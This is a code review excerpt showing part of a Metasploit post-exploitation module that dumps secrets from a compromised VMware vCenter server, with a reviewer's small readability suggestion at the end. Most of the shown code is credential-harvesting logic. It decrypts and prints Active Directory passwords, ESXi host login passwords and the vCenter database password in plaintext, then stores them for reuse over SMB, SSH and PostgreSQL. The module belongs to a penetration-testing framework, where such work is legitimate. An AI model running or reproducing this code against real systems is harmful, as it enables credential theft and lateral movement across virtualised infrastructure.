modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,875 @@
+      when true
+        print_good("\tAD User: #{domain_user}@#{domain_base}")
+      when false
+        print_good("\tAD User: #{domain_base}\\#{domain_user}")
+      end
+      print_good("\tAD Pass: #{secret_plaintext}")
+
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        port: 445,
+        protocol: 'tcp',
+        service_name: 'Windows',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: domain_base
+      }
+
+      store_valid_credential(user: domain_user, private: secret_plaintext, service_data: extra_service_data)
+    end
+  end
+
+  def enum_vpx_user_creds
+    vpxuser_rows = get_vpx_users(shell_vcdb_pass, vcdb_user, vcdb_name, vc_sym_key)
+
+    if vpxuser_rows.nil? || output.empty?
+      print_warning('No ESXi hosts attached to this vCenter system')
+      return
+    end
+
+    vpxuser_rows.each do |user|
+      print_good("ESXi Host #{user['fqdn']} [#{user['ip']}]\t LOGIN: #{user['user']} PASS: #{user['password']}")
+
+      extra_service_data = {
+        address: user['ip'],
+        port: 22,
+        protocol: 'tcp',
+        service_name: 'ssh',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: user['fqdn']
+      }
+
+      # XXX is this always root? store_valid_credential(user: 'root', private: user['password'], service_data: extra_service_data)
+      store_valid_credential(user: user['user'], private: user['password'], service_data: extra_service_data)
+    end
+  end
+
+  def get_db_creds
+    db_properties = process_vcdb_properties_file
+
+    self.vcdb_name = db_properties['name']
+    self.vcdb_user = db_properties['username']
+    self.vcdb_pass = db_properties['password']
+
+    self.shell_vcdb_pass = "'#{vcdb_pass.gsub("'") { "\\'" }}'"
+
+    print_good("\tVCDB Name: #{vcdb_name}")
+    print_good("\tVCDB User: #{vcdb_user}")
+    print_good("\tVCDB Pass: #{vcdb_pass}")
+
+    extra_service_data = {
+      address: Rex::Socket.getaddress(rhost),
+      port: 5432,
+      service_name: 'psql',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: vcdb_name
+    }
+
+    store_valid_credential(user: vcdb_user, private: vcdb_pass, service_data: extra_service_data)
+  end
+
+  def validate_sts_cert(test_cert)
+    cert = validate_x509_cert(test_cert)
+    return false if cert.nil?
+
+    vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
+
+    idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
+
+    unless idm_cmd != ''
```

Comment:
Little bit more readable:
```suggestion
    if idm_cmd.blank?
```